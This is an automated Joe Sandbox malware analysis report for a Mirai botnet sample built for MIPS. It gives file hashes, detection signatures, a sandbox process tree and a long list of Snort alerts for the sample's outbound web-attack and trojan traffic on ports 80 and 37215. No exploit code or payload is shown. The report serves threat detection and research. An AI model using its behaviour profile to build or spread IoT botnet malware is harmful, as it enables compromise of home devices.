Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
HfuP5Csj29.elf

Overview

General Information

Sample name:HfuP5Csj29.elf
renamed because original name is a hash value
Original sample name:6fd6d69de3edc6a9ca776964c5f17e8c.elf
Analysis ID:1425761
MD5:6fd6d69de3edc6a9ca776964c5f17e8c
SHA1:7a95613c08c25eaaf641dbc33f7b0661feae52ad
SHA256:a06433ded3ebdd9021c167585a08ccac0ac4bd8e8a811b51770a4d0f6229e256
Tags:32elfmipsmirai
Infos:

Detection

Mirai
Score:88
Range:0 - 100
Whitelisted:false

Signatures

Antivirus / Scanner detection for submitted sample
Detected Mirai
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected Mirai
Sample tries to kill multiple processes (SIGKILL)
Uses known network protocols on non-standard ports
Detected TCP or UDP traffic on non-standard ports
Enumerates processes within the "proc" file system
Executes the "rm" command used to delete files or directories
HTTP GET or POST without a user agent
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample has stripped symbol table
Sample tries to kill a process (SIGKILL)
Uses the "uname" system call to query kernel version information (possible evasion)

Classification

Analysis Advice

Some HTTP requests failed (404). It is likely that the sample will exhibit less behavior.
Static ELF header machine description suggests that the sample might not execute correctly on this machine.
Static ELF header machine description suggests that the sample might only run correctly on MIPS or ARM architectures.

General Information

Joe Sandbox version:40.0.0 Tourmaline
Analysis ID:1425761
Start date and time:2024-04-14 16:34:05 +02:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 6m 48s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:HfuP5Csj29.elf
renamed because original name is a hash value
Original Sample Name:6fd6d69de3edc6a9ca776964c5f17e8c.elf
Detection:MAL
Classification:mal88.spre.troj.linELF@0/0@0/0

Warnings

  • Report size exceeded maximum capacity and may have missing network information.

Runtime Messages

Command:/tmp/HfuP5Csj29.elf
PID:6210
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
Infected By Cult
Standard Error:

Process Tree

  • system is lnxubuntu20
  • dash New Fork (PID: 6259, Parent: 4331)
  • rm (PID: 6259, Parent: 4331, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.0p6hgVyDzb /tmp/tmp.mbEvCYH2N6 /tmp/tmp.A9cxoroPmn
  • dash New Fork (PID: 6260, Parent: 4331)
  • cat (PID: 6260, Parent: 4331, MD5: 7e9d213e404ad3bb82e4ebb2e1f2c1b3) Arguments: cat /tmp/tmp.0p6hgVyDzb
  • dash New Fork (PID: 6261, Parent: 4331)
  • head (PID: 6261, Parent: 4331, MD5: fd96a67145172477dd57131396fc9608) Arguments: head -n 10
  • dash New Fork (PID: 6262, Parent: 4331)
  • tr (PID: 6262, Parent: 4331, MD5: fbd1402dd9f72d8ebfff00ce7c3a7bb5) Arguments: tr -d \\000-\\011\\013\\014\\016-\\037
  • dash New Fork (PID: 6263, Parent: 4331)
  • cut (PID: 6263, Parent: 4331, MD5: d8ed0ea8f22c0de0f8692d4d9f1759d3) Arguments: cut -c -80
  • dash New Fork (PID: 6264, Parent: 4331)
  • cat (PID: 6264, Parent: 4331, MD5: 7e9d213e404ad3bb82e4ebb2e1f2c1b3) Arguments: cat /tmp/tmp.0p6hgVyDzb
  • dash New Fork (PID: 6265, Parent: 4331)
  • head (PID: 6265, Parent: 4331, MD5: fd96a67145172477dd57131396fc9608) Arguments: head -n 10
  • dash New Fork (PID: 6266, Parent: 4331)
  • tr (PID: 6266, Parent: 4331, MD5: fbd1402dd9f72d8ebfff00ce7c3a7bb5) Arguments: tr -d \\000-\\011\\013\\014\\016-\\037
  • dash New Fork (PID: 6267, Parent: 4331)
  • cut (PID: 6267, Parent: 4331, MD5: d8ed0ea8f22c0de0f8692d4d9f1759d3) Arguments: cut -c -80
  • dash New Fork (PID: 6268, Parent: 4331)
  • rm (PID: 6268, Parent: 4331, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.0p6hgVyDzb /tmp/tmp.mbEvCYH2N6 /tmp/tmp.A9cxoroPmn
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
MiraiMirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Mirai_12Yara detected MiraiJoe Security

    Snort Signatures

    Timestamp:04/14/24-16:36:20.236685
    SID:2839471
    Source Port:60104
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:35:46.905684
    SID:2839471
    Source Port:39038
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:37:22.500041
    SID:2839471
    Source Port:59522
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:36:38.691987
    SID:2839471
    Source Port:58660
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:36:38.054988
    SID:2839471
    Source Port:35506
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:36:50.178611
    SID:2839471
    Source Port:52808
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:35:07.676645
    SID:2839471
    Source Port:56954
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:35:11.826436
    SID:2839471
    Source Port:33510
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:37:33.657007
    SID:2839471
    Source Port:57110
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:36:20.356061
    SID:2839471
    Source Port:33532
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:36:15.169178
    SID:2839471
    Source Port:58766
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:35:59.955561
    SID:2839471
    Source Port:40762
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:36:46.750907
    SID:2839471
    Source Port:50384
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:35:45.500066
    SID:2839471
    Source Port:33224
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:35:37.783240
    SID:2839471
    Source Port:53244
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:36:13.107224
    SID:2839471
    Source Port:48056
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:35:44.788895
    SID:2839471
    Source Port:56746
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:36:09.845717
    SID:2839471
    Source Port:47636
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:36:24.021055
    SID:2839471
    Source Port:55982
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:36:20.264042
    SID:2839471
    Source Port:57384
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:37:08.265276
    SID:2839471
    Source Port:39534
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:36:47.068794
    SID:2839471
    Source Port:48526
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:35:18.247931
    SID:2829579
    Source Port:33276
    Destination Port:37215
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:04/14/24-16:35:04.281882
    SID:2839471
    Source Port:57406
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:36:50.332643
    SID:2829579
    Source Port:33108
    Destination Port:37215
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:04/14/24-16:37:26.907675
    SID:2839471
    Source Port:60122
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:36:24.313063
    SID:2839471
    Source Port:47438
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:36:41.800021
    SID:2839471
    Source Port:38718
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:37:02.502251
    SID:2839471
    Source Port:40676
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:36:10.505850
    SID:2839471
    Source Port:46266
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:35:40.521483
    SID:2839471
    Source Port:49002
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:36:15.516801
    SID:2839471
    Source Port:44398
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:36:56.728759
    SID:2829579
    Source Port:55408
    Destination Port:37215
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:04/14/24-16:36:20.244435
    SID:2839471
    Source Port:57572
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:36:56.050441
    SID:2839471
    Source Port:51546
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:35:30.387978
    SID:2839471
    Source Port:41966
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:36:32.257018
    SID:2839471
    Source Port:43320
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:37:02.074399
    SID:2839471
    Source Port:55456
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:34:54.088281
    SID:2839471
    Source Port:51090
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:35:04.281881
    SID:2839471
    Source Port:42044
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:35:30.207247
    SID:2839471
    Source Port:55410
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:35:26.030866
    SID:2839471
    Source Port:52172
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:35:04.322200
    SID:2839471
    Source Port:35472
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:36:11.438117
    SID:2839471
    Source Port:34030
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:35:55.000457
    SID:2839471
    Source Port:37028
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:36:20.252031
    SID:2839471
    Source Port:58616
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:36:04.018082
    SID:2839471
    Source Port:56936
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:36:26.267556
    SID:2839471
    Source Port:59446
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:36:56.728759
    SID:2835222
    Source Port:55408
    Destination Port:37215
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:04/14/24-16:35:50.565718
    SID:2839471
    Source Port:37864
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:36:46.435738
    SID:2839471
    Source Port:58348
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:36:59.410669
    SID:2839471
    Source Port:52298
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:37:02.375186
    SID:2839471
    Source Port:51148
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:35:30.555525
    SID:2839471
    Source Port:42666
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:36:20.254920
    SID:2839471
    Source Port:60638
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:37:12.254502
    SID:2839471
    Source Port:46532
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:37:24.452395
    SID:2839471
    Source Port:52850
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:35:03.936919
    SID:2839471
    Source Port:59774
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:35:23.038587
    SID:2839471
    Source Port:37476
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:35:40.291744
    SID:2839471
    Source Port:43966
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:36:30.568903
    SID:2839471
    Source Port:55628
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:35:11.821698
    SID:2839471
    Source Port:47932
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:37:29.052528
    SID:2839471
    Source Port:35164
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:35:40.215950
    SID:2839471
    Source Port:53926
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:36:11.420213
    SID:2839471
    Source Port:57400
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:35:20.714233
    SID:2839471
    Source Port:41702
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:35:07.283636
    SID:2839471
    Source Port:44640
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:35:15.543181
    SID:2839471
    Source Port:54002
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:36:22.344998
    SID:2839471
    Source Port:60386
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:35:37.199651
    SID:2839471
    Source Port:47178
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:35:56.728636
    SID:2839471
    Source Port:40644
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:35:47.843867
    SID:2839471
    Source Port:34472
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:35:06.983767
    SID:2839471
    Source Port:57664
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:37:33.663601
    SID:2839471
    Source Port:37822
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:35:17.429497
    SID:2839471
    Source Port:57910
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:34:57.000413
    SID:2839471
    Source Port:49420
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:36:18.587452
    SID:2839471
    Source Port:35126
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:36:32.252148
    SID:2839471
    Source Port:51260
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:36:11.420620
    SID:2839471
    Source Port:58096
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:35:30.375210
    SID:2839471
    Source Port:41336
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:35:40.524983
    SID:2839471
    Source Port:39226
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:37:24.165021
    SID:2839471
    Source Port:40894
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:37:16.959247
    SID:2839471
    Source Port:46768
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:36:22.238857
    SID:2839471
    Source Port:49672
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:36:56.502309
    SID:2839471
    Source Port:39766
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:36:38.067722
    SID:2839471
    Source Port:59636
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:36:07.214787
    SID:2839471
    Source Port:44874
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:36:32.642401
    SID:2839471
    Source Port:51864
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:36:56.610015
    SID:2839471
    Source Port:51316
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:36:32.642473
    SID:2839471
    Source Port:53820
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:35:06.962911
    SID:2839471
    Source Port:40582
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:35:40.285476
    SID:2839471
    Source Port:33002
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:36:21.595800
    SID:2839471
    Source Port:46552
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:36:50.819600
    SID:2839471
    Source Port:46492
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:35:59.963481
    SID:2839471
    Source Port:35558
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:36:10.804570
    SID:2839471
    Source Port:46288
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:36:38.343963
    SID:2839471
    Source Port:33048
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:36:42.580545
    SID:2839471
    Source Port:50730
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:37:30.635955
    SID:2839471
    Source Port:58194
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:37:11.649804
    SID:2839471
    Source Port:37350
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:35:42.150221
    SID:2839471
    Source Port:47104
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:36:15.169144
    SID:2839471
    Source Port:58768
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:36:18.935095
    SID:2839471
    Source Port:57626
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:36:56.046029
    SID:2839471
    Source Port:34710
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:37:30.507114
    SID:2839471
    Source Port:41088
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:36:10.190937
    SID:2839471
    Source Port:54302
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:34:56.720478
    SID:2839471
    Source Port:39212
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:36:26.231290
    SID:2839471
    Source Port:46166
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:36:47.372178
    SID:2839471
    Source Port:53618
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:35:57.059115
    SID:2839471
    Source Port:49592
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:37:02.109890
    SID:2839471
    Source Port:54862
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:36:35.399160
    SID:2839471
    Source Port:38746
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:37:08.272866
    SID:2839471
    Source Port:55836
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:37:02.441414
    SID:2839471
    Source Port:56132
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:37:21.857470
    SID:2839471
    Source Port:59442
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:35:47.548250
    SID:2839471
    Source Port:44130
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:36:21.648304
    SID:2839471
    Source Port:56054
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:37:24.518628
    SID:2839471
    Source Port:46308
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:36:04.021895
    SID:2839471
    Source Port:53220
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:37:28.759237
    SID:2839471
    Source Port:59386
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:35:35.568824
    SID:2839471
    Source Port:57296
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:37:04.210307
    SID:2839471
    Source Port:43660
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:35:21.365604
    SID:2839471
    Source Port:57558
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:36:10.804516
    SID:2839471
    Source Port:46284
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:37:24.188011
    SID:2839471
    Source Port:57704
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:37:07.977631
    SID:2839471
    Source Port:34700
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:36:09.899529
    SID:2839471
    Source Port:44240
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:36:20.274271
    SID:2839471
    Source Port:43060
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:37:12.205566
    SID:2839471
    Source Port:35938
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:37:35.643867
    SID:2839471
    Source Port:57402
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:36:41.742957
    SID:2839471
    Source Port:32994
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:37:26.926940
    SID:2839471
    Source Port:58066
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:36:30.892450
    SID:2839471
    Source Port:50762
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:36:54.408995
    SID:2839471
    Source Port:42326
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:37:26.198837
    SID:2839471
    Source Port:53240
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:35:54.208745
    SID:2839471
    Source Port:36514
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:37:12.265796
    SID:2839471
    Source Port:35536
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:36:35.690588
    SID:2839471
    Source Port:40242
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:35:35.587926
    SID:2839471
    Source Port:42456
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:35:12.149962
    SID:2839471
    Source Port:50616
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:35:17.727133
    SID:2839471
    Source Port:48922
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:36:59.135522
    SID:2839471
    Source Port:51626
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:36:46.756431
    SID:2839471
    Source Port:37078
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:36:11.441931
    SID:2839471
    Source Port:51932
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:37:26.186605
    SID:2839471
    Source Port:60630
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:35:42.142572
    SID:2839471
    Source Port:54412
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:36:13.418277
    SID:2839471
    Source Port:45628
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:36:18.598064
    SID:2839471
    Source Port:52216
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:37:24.168009
    SID:2839471
    Source Port:34520
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:36:50.156950
    SID:2839471
    Source Port:42318
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:37:17.263243
    SID:2839471
    Source Port:36662
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:37:31.442994
    SID:2839471
    Source Port:39562
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:37:00.386211
    SID:2839471
    Source Port:36280
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:37:10.995822
    SID:2839471
    Source Port:56326
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:37:21.564159
    SID:2839471
    Source Port:59430
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:37:02.417216
    SID:2839471
    Source Port:42438
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:36:29.908880
    SID:2839471
    Source Port:39078
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:35:40.492606
    SID:2839471
    Source Port:52712
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:37:19.255113
    SID:2839471
    Source Port:32966
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:37:21.532963
    SID:2839471
    Source Port:53280
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:35:40.197764
    SID:2839471
    Source Port:47020
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:37:12.664658
    SID:2839471
    Source Port:41918
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:35:29.737067
    SID:2839471
    Source Port:54728
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:35:54.804575
    SID:2839471
    Source Port:33616
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:35:57.071303
    SID:2839471
    Source Port:59332
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:35:15.511933
    SID:2839471
    Source Port:40370
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:36:53.540788
    SID:2839471
    Source Port:47128
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:36:47.430325
    SID:2839471
    Source Port:45022
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:37:05.138411
    SID:2839471
    Source Port:51892
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:37:10.994188
    SID:2839471
    Source Port:46446
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:36:58.412777
    SID:2839471
    Source Port:40834
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:36:15.838325
    SID:2839471
    Source Port:33220
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
    Timestamp:04/14/24-16:37:02.144860
    SID:2839471
    Source Port:50076
    Destination Port:80
    Protocol:TCP
    Classtype:Web Application Attack
